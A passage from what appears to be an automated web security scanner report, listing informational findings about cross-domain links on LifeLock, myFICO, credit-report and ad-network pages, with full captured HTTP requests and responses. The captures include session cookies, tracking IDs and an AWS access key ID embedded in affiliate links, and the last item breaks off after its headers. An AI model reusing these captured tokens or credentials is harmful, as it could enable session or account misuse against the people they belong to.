                               <a href="http://www.amazon.com/Mulan-Special-Miguel-Ferrer/dp/B00024I2Z4%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB00024I2Z4" alt="Mulan (Special Edition)" title="Mulan (Special Edition)">
                               <img class="amazonthumbshotimage"    src="http://ecx.images-amazon.com/images/I/51S08V94RAL._SL75_.jpg"></a>
...[SNIP]...
<span
                   class="resulttitle"><a class="resultlink"
                   href="http://www.amazon.com/Mulan-Special-Miguel-Ferrer/dp/B00024I2Z4%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB00024I2Z4">
Mulan (Special Edition)</a>&nbsp;
               <a target="_blank" class="resultlink"
                   href="http://www.amazon.com/Mulan-Special-Miguel-Ferrer/dp/B00024I2Z4%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB00024I2Z4" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                   src="images/nw_blue.gif">
...[SNIP]...
<td class="thumbshottd" align="left" width="1%">
                               <a href="http://www.amazon.com/Conditioner-Screen-SleepMate-Electro-Mechanical-Machine/dp/B000J1UJWE%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB000J1UJWE" alt="Sound Conditioner Sound Screen SleepMate Electro-Mechanical White Noise Machine" title="Sound Conditioner Sound Screen SleepMate Electro-Mechanical White Noise Machine">
                               <img class="amazonthumbshotimage"    src="http://ecx.images-amazon.com/images/I/31MYETZZXXL._SL75_.jpg"></a>
...[SNIP]...
<span
                   class="resulttitle"><a class="resultlink"
                   href="http://www.amazon.com/Conditioner-Screen-SleepMate-Electro-Mechanical-Machine/dp/B000J1UJWE%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB000J1UJWE">
Sound Conditioner Sound Screen SleepMate Electro-Mechanical White Noise Machine</a>&nbsp;
               <a target="_blank" class="resultlink"
                   href="http://www.amazon.com/Conditioner-Screen-SleepMate-Electro-Mechanical-Machine/dp/B000J1UJWE%3FSubscriptionId%3DAKIAJWM7O3D5GGCWUQYQ%26tag%3Dbelezashop-20%26linkCode%3Dxm2%26camp%3D2025%26creative%3D165953%26creativeASIN%3DB000J1UJWE" alt="Open page in new window" title="Open page in new window">
<img class="newwindowimage" border="0"
                   src="images/nw_blue.gif">
...[SNIP]...
<div width=162 align=right>
<iframe name="I1" src="http://pub.retailer-amazon.net/banner_120_600_a.php?search={$keyword}" marginwidth="1" marginheight="1" height="601" width="162" scrolling="no" align="middle" border="0" frameborder="0">
</iframe>
...[SNIP]...
</iframe> -->
<iframe name="I1" src="http://pub.retailer-amazon.net/banner_728_90_a.php?search={$keyword}" marginwidth="1" marginheight="1" height="90" width="728" scrolling="no" align="middle" border="0" frameborder="0">
</iframe>
...[SNIP]...
<td height="10px;" align="center" style="padding-bottom:5px;"><a style="color:threedshadow; font-weight: normal; font-size:11px; text-decoration:none;" href="http://www.inoutscripts.com/?r=">Powered by Inoutscripts</a>
...[SNIP]...
</span>
<a style="color: threedshadow; font-weight: normal; font-size:11px; text-decoration:none;" href="http://www.thumbshots.com" target="_blank" title="About Thumbshots thumbnails">About Thumbshots thumbnails</a>
...[SNIP]...

23.539. http://www.lifelock.com/offers/faces/female/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /offers/faces/female/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /offers/faces/female/?promocodehide=ADCONIONRT&c3metrics=adcon HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; LifeLockEnrollment=promoCode=GOOGSEARCH13; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:33:06 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpool_www.lifelock.com=335809034.20480.0000; path=/
Set-Cookie: TSceba2f=a1dd5475d17a0429c45b558d5def1feccc7981bb25f0484c4db41882; Path=/
Vary: Accept-Encoding
Connection: close

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<li><a href="http://www.facebook.com/LifeLock" class="facebook" target="_blank">Find Us On<br />
...[SNIP]...
<li><a href="http://twitter.com/lifelock" class="twitter" target="_blank">Follow Us On<br />
...[SNIP]...
<li class="verisign">
    <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.lifelock.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<li>
    <a class="truste" href="http://www.truste.org/ivalidate.php?url=www.lifelock.com&amp;sealid=101" target="_blank" rel="nofollow">
<img src="http://www.lifelock.com/images/logo-truste.gif" alt="trustE certified - click to verify" />
...[SNIP]...
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<!-- START ATLAS --><script type="text/javascript" src="http://switch.atdmt.com/jaction/LifeLock_Landing_Page"></script><noscript><iframe src="http://switch.atdmt.com/iaction/LifeLock_Landing_Page" width="1" height="1" frameborder="0" class="noscript" scrolling="no"></iframe>
...[SNIP]...
<!-- *** CLICK TRACKING CODE 3.0 *** --> <script type="text/javascript" defer="defer" src="http://keywordmax.com/tracking/show.php?id=661075270&amp;location=Homepage"></script><noscript class="noscript"><img src="http://keywordmax.com/tracking/log.php?id=661075270&amp;loc=Homepage" class="noscript" width="1" height="1" alt="google click tracker" /></noscript>
...[SNIP]...

23.540. http://www.my3bureaucreditreport.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.my3bureaucreditreport.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?sid=12750&ad=12759 HTTP/1.1
Host: www.my3bureaucreditreport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=5tbjrf45yiir35y4yn0kd1qi; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 00:57:07 GMT
Content-Length: 10650


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/
...[SNIP]...
<div id="hdr_flags">
<a href="http://www.freecanadiancreditreport.com/?sid=FN102" title="credit reports"><img src="/images/flag_can_40x20.gif" width="30" height="15" alt="credit report" title="credit report" />
...[SNIP]...
</strong> from each of the 3 major credit bureaus annually from
<a class="type07" href="http://www.annualcreditreport.com" title="annual credit report">AnnualCreditReport.com</a>
...[SNIP]...

23.541. https://www.myfico.com/Store/Register.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myfico.com
Path:   /Store/Register.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /Store/Register.aspx?Product=2016&trialdays=2016d10&amuc=4%2c4125%2c39332 HTTP/1.1
Host: www.myfico.com
Connection: keep-alive
Referer: https://www.myfico.com/Store/Register.aspx?Product=2016&trialdays=2016d10&amuc=4,4125,39332
Cache-Control: max-age=0
Origin: https://www.myfico.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN; TransactionID=800900002030400007100900002007; LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; Experiment=47=A; amcus=; amcd=f39ebcfe7b8d92f801e54dcbf76037de%2C02%2C1%2CGd%7Czg%7Czj%7Czd%7CJt%7CzK%7CJQ%7CCj%7CIV%2C1%2C7jdq%2C6%2C8C@@c_Homepage%5Dg8%2C7jcW%7C14x%2C1%2C1%7Daeo%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%21aep%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW@%7C%7C%7C@; __qca=P0-1792545009-1303691708467; cmTPSet=Y; CoreID6=96447579584513036917094; MYFICO=trialdays2016=10&NewPurchaser=yes; PromoCode=; acopendivids=nada; acgroupswithpersist=nada; 90223518_clogin=l=1303691709&v=1&e=1303693603459; NewUser=4/24/2011 7:37:16 PM; fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; ShowCCC=t; SourceProdInfo=prodid=&originid=; 90223518_clogin=l=1303691709&v=1&e=1303693688117; cmRS=&t1=1303691803452&t2=-1&t3=1303691888115&t4=1303691798835&fti=1303691888115&fn=aspnetForm%3A0%3B&ac=0:S&fd=0%3A8%3Actl00%24cphMainContent%24oLoginControl%24Button1%3B&uer=&fu=Register.aspx%3FProduct%3D2016%26trialdays%3D2016d10%26amuc%3D4%252c4125%252c39332&pi=Store/Register.aspx&ho=data.coremetrics.com/eluminate%3F&ci=90223518&ul=https%3A//www.myfico.com/Store/Register.aspx%3FProduct%3D2016%26trialdays%3D2016d10%26amuc%3D4%2C4125%2C39332&rf=http%3A//www.myfico.com/Default.aspx&cjen=1
Content-Length: 4879

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTYwNjQ2MjUxNQ9kFgJmD2QWCGYPZBYEZg8WAh4HVmlzaWJsZWhkAgEPFgIfAGdkAgIPZBYGAgEPFgIfAGdkAgUPFgIeBGhyZWYFDS9jc3MvZmljby5jc3NkAgYPFgIfAGhkAgQPZBYMZg9kFg
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 00:37:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 00:37:56 GMT
Connection: keep-alive
Set-Cookie: NewUser=4/24/2011 7:37:18 PM; path=/
Set-Cookie: fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Content-Length: 40429

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >


<html>
<head><title>
   Please Log In or Create an Account
</title>
<meta http-equiv="X-UA-Comp
...[SNIP]...
<noscript>
<img alt="" src="https://srv.amadesa.com/Interaction2/app?pid=534&us=1&slot=amTop" width="1" height="1" border="0" style="visibility:hidden" />
</noscript>
...[SNIP]...
<div id="cpversignseal"><script src=https://seal.verisign.com/getseal?host_name=www.myfico.com&size=S&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
<td width="135" align="center" valign="top"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.myfico.com&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

23.542. https://www.myfico.com/SystemAccess/ForgotMemberInfo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myfico.com
Path:   /SystemAccess/ForgotMemberInfo.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /SystemAccess/ForgotMemberInfo.aspx?ReturnUrl=&CreditKit=&& HTTP/1.1
Host: www.myfico.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN; TransactionID=800900002030400007100900002007; LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; Experiment=47=A; amcus=; amcd=f39ebcfe7b8d92f801e54dcbf76037de%2C02%2C1%2CGd%7Czg%7Czj%7Czd%7CJt%7CzK%7CJQ%7CCj%7CIV%2C1%2C7jdq%2C6%2C8C@@c_Homepage%5Dg8%2C7jcW%7C14x%2C1%2C1%7Daeo%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%21aep%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW@%7C%7C%7C@; __qca=P0-1792545009-1303691708467; cmTPSet=Y; CoreID6=96447579584513036917094; NewUser=4/24/2011 7:35:48 PM; fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; ShowCCC=t; SourceProdInfo=prodid=&originid=; MYFICO=trialdays2016=10&NewPurchaser=yes; PromoCode=; acopendivids=nada; acgroupswithpersist=nada; 90223518_clogin=l=1303691709&v=1&e=1303693603459; 90223518_clogin=l=1303691709&v=1&e=1303693603470

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 01:27:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 01:27:45 GMT
Connection: keep-alive
Set-Cookie: fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Content-Length: 23918

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >

<html>
<head><title>
   Forgot your Login ID or Password?
</title>
<meta http-equiv="X-UA-Compatible"
...[SNIP]...
<noscript>
<img alt="" src="https://srv.amadesa.com/Interaction2/app?pid=534&us=1&slot=amTop" width="1" height="1" border="0" style="visibility:hidden" />
</noscript>
...[SNIP]...
<td width="135" align="center" valign="top"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.myfico.com&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

23.543. http://www.neudesicmediagroup.com/Advertising.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neudesicmediagroup.com
Path:   /Advertising.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Advertising.aspx?site=Silverlight HTTP/1.1
Host: www.neudesicmediagroup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sun, 24 Apr 2011 15:57:47 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Cache-Control: private
Set-Cookie: ASP.NET_SessionId=lj4w123xqtsd2d2iz1t3iqwv; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 13360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Contact Us |
...[SNIP]...
ntent="online advertising, microsoft advertising, internet advertising, web advertising, advertising network, buy advertising, sell advertising, internet ads, media solutions for publishers" />
   

   <script type="text/javascript" src="http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.min.js?v=6"></script>
...[SNIP]...
</a> <a href="http://twitter.com/NeudesicMedia" class="twitter">
               <img src="/resources/images/spacer.gif?v=6" alt="Twitter" width="24" height="23" border="0" /></a> <a href="http://www.facebook.com/pages/Neudesic-Media-Group/106923456664" class="facebook">
                   <img src="/resources/images/spacer.gif?v=6" alt="Facebook" width="24" height="23" border="0" />
...[SNIP]...
<a href="/pay"><img src="https://www.paypal.com/en_US/i/btn/btn_paynow_LG.gif"></a>
...[SNIP]...
<div class="map">
                   <a target="_blank" href="http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=Neudesic+LLC,+Irvine,+CA&sll=33.649208,-117.743568&sspn=0.106745,0.222988&gl=us&g=8105+Irvine+Center+Dr,+Irvine,+Orange,+California+92618&ie=UTF8&hq=Neudesic+LLC,&hnear=Irvine,+CA&ll=33.657781,-117.768116&spn=0.106735,0.222988&z=13&iwloc=A&cid=5022547561072180428">
                       <img src="/resources/images/map.jpg?v=6" alt="Map" />
...[SNIP]...
<p class="leftt">
               Neudesic, LLC &copy;
               2011. All Rights Reserved. Neudesic Media Group is a division of Neudesic, LLC. - <a rel="nofollow" href="http://www.neudesic.com/" target="_blank">www.neudesic.com</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s18.sitemeter.com/js/counter.js?site=s18neumedia"></script>
   <noscript><a rel="nofollow" href="http://s18.sitemeter.com/stats.asp?site=s18neumedia" target="_blank"><img src="http://s18.sitemeter.com/meter.asp?site=s18neumedia" alt="Site Meter" border="0" /></a>
...[SNIP]...

23.544. http://www.nextadvisor.com/credit_report_monitoring/compare.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/compare.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /credit_report_monitoring/compare.php?h1=4&a=2&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQ HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:55:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=8e16e97cfee8227e18a5c43f03009ed6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 54422


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a>
...[SNIP]...
<div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" />
...[SNIP]...

23.545. http://www.onlinereputationmanager.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinereputationmanager.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?gclid=CKqyh-O1tqgCFQbc4AodP0FlBA HTTP/1.1
Host: www.onlinereputationmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 33474
Content-Type: text/html
Content-Location: http://www.onlinereputationmanager.com/Index.html
Last-Modified: Tue, 01 Mar 2011 07:10:40 GMT
